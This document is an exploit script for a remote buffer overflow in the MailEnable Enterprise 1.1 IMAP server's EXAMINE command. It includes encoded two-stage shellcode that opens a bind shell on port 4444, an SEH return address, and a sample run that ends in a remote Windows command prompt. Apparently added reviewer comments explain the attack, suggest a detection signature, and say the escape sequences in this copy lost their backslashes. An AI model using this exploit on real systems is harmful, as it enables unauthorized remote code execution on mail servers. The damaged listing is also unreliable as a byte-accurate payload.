
# Title : MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit
# Published : 2005-12-19
# Author : muts


#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obsessions
# * Talz - for helping me out with the 1st stage shellcode
#
#		 FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
# 
# global _start
#
# _start:
# 
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
# 
# ;--- copy eip into ecx 
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch      ; ecx=-256;
# dec ch      ; ecx=-256;
# jmp ecx     ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################

import sys
import struct
import socket
from time import sleep

# Proof-of-concept for the IMAP EXAMINE overflow described in the header
# comment above (MailEnable Enterprise 1.1 without the ME-10009.EXE patch).
# Flow as written: connect -> LOGIN with the supplied credentials -> one
# oversized EXAMINE argument -> disconnect. The script logs in before sending
# EXAMINE and never checks the LOGIN reply, which suggests the vulnerable path
# needs a valid IMAP account (post-authentication) - verify against the
# server; from a defender's view, an authenticated IMAP session issuing an
# EXAMINE with a ~1 KB mailbox argument is the observable signature, and the
# vendor patch named in the header is the fix.
# NOTE(review): the escape sequences in this copy's string literals look like
# they lost their backslashes in transcription (e.g. 'x90', 'rn', 'n'), so
# the listing is not byte-for-byte what the author ran.
# Python 2 syntax throughout (print statement, str sockets).
if len(sys.argv)!=5:
	print "nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
        print "nDiscovered / Coded by mati@see-security.comn"
        print "Usage: %s <ip> <port> <user> <pass>n" %sys.argv[0]
        sys.exit(0)

# Plain TCP client socket; the IMAP session below is unencrypted, so the
# LOGIN credentials go over the wire in cleartext.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Return Address - Win2k SP4 jmp ebx
# (4 bytes overwriting the SEH handler; see "SEH gets overwritten" in the
# header - target-specific, which is why the header quotes a VMware offset
# that differs from the bare-metal one.)
returnaddress = "x66x4ax4ex7c"

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
# (per the header: a small stub that jumps back 512 bytes into sc2 because
# there is no room for the full payload at the overwrite point)

sc = "x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x16x91x9c"
sc +="x30x83xebxfcxe2xf4xcfx7fx45x44x32x65xc5xb0xd7x9b"
sc +="x0cxcexdbx6fx51xcfxf7x91x9cx30"

# win32_bind -  EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode
# (the bind-shell payload; the encoder was chosen to avoid the bytes the
# header lists as filtered: 0x00 0x0a 0x0d 0x20 0x22)

sc2 = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xfa"
sc2 +="xa8xc8x2ax83xebxfcxe2xf4x06xc2x23x67x12x51x37xd5"
sc2 +="x05xc8x43x46xdex8cx43x6fxc6x23xb4x2fx82xa9x27xa1"
sc2 +="xb5xb0x43x75xdaxa9x23x63x71x9cx43x2bx14x99x08xb3"
sc2 +="x56x2cx08x5exfdx69x02x27xfbx6ax23xdexc1xfcxecx02"
sc2 +="x8fx4dx43x75xdexa9x23x4cx71xa4x83xa1xa5xb4xc9xc1"
sc2 +="xf9x84x43xa3x96x8cxd4x4bx39x99x13x4ex71xebxf8xa1"
sc2 +="xbaxa4x43x5axe6x05x43x6axf2xf6xa0xa4xb4xa6x24x7a"
sc2 +="x05x7exaex79x9cxc0xfbx18x92xdfxbbx18xa5xfcx37xfa"
sc2 +="x92x63x25xd6xc1xf8x37xfcxa5x21x2dx4cx7bx45xc0x28"
sc2 +="xafxc2xcaxd5x2axc0x11x23x0fx05x9fxd5x2cxfbx9bx79"
sc2 +="xa9xfbx8bx79xb9xfbx37xfax9cxc0xd9x76x9cxfbx41xcb"
sc2 +="x6fxc0x6cx30x8ax6fx9fxd5x2cxc2xd8x7bxafx57x18x42"
sc2 +="x5ex05xe6xc3xadx57x1ex79xafx57x18x42x1fxe1x4ex63"
sc2 +="xadx57x1ex7axaexfcx9dxd5x2ax3bxa0xcdx83x6exb1x7d"
sc2 +="x05x7ex9dxd5x2axcexa2x4ex9cxc0xabx47x73x4dxa2x7a"
sc2 +="xa3x81x04xa3x1dxc2x8cxa3x18x99x08xd9x50x56x8ax07"
sc2 +="x04xeaxe4xb9x77xd2xf0x81x51x03xa0x58x04x1bxdexd5"
sc2 +="x8fxecx37xfcxa1xffx9ax7bxabxf9xa2x2bxabxf9x9dx7b"
sc2 +="x05x78xa0x87x23xadx06x79x05x7exa2xd5x05x9fx37xfa"
sc2 +="x71xffx34xa9x3exccx37xfcxa8x57x18x42x15x66x28x4a"
sc2 +="xa9x57x1exd5x2axa8xc8x2a"

# Buffer layout as the line reads: padding, sc2, padding, the SEH overwrite,
# a 2-byte short jump over the following 4 bytes, then the stage-1 stub.
# The total is what the header calls the ~965-byte overwrite distance.
buffer = 'x90'*568 + sc2 + 'x90'*53 + returnaddress + 'xEBx04' + 'x90'*4 + sc

print "nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.comn"
print "[+] Connecting to " + sys.argv[1]
try:
	s.connect((sys.argv[1],int(sys.argv[2])))
# NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit and a
# ValueError from a non-numeric port, reporting them all as a connect failure.
except:
        print "Could not connect to IMAP server!"
        sys.exit(0)

# Server greeting (the "* OK IMAP4rev1 ..." banner in the header's sample run).
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
# Credentials are sent in the clear; the reply is printed but not checked,
# so a failed login is not detected before the next step.
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'rn')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
# The single malformed command: one EXAMINE whose mailbox argument is the
# oversized buffer built above. Nothing is read back; the socket is closed.
s.send('A001 EXAMINE ' + buffer+'rn')
s.close()
print "[+] Donen"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!n"
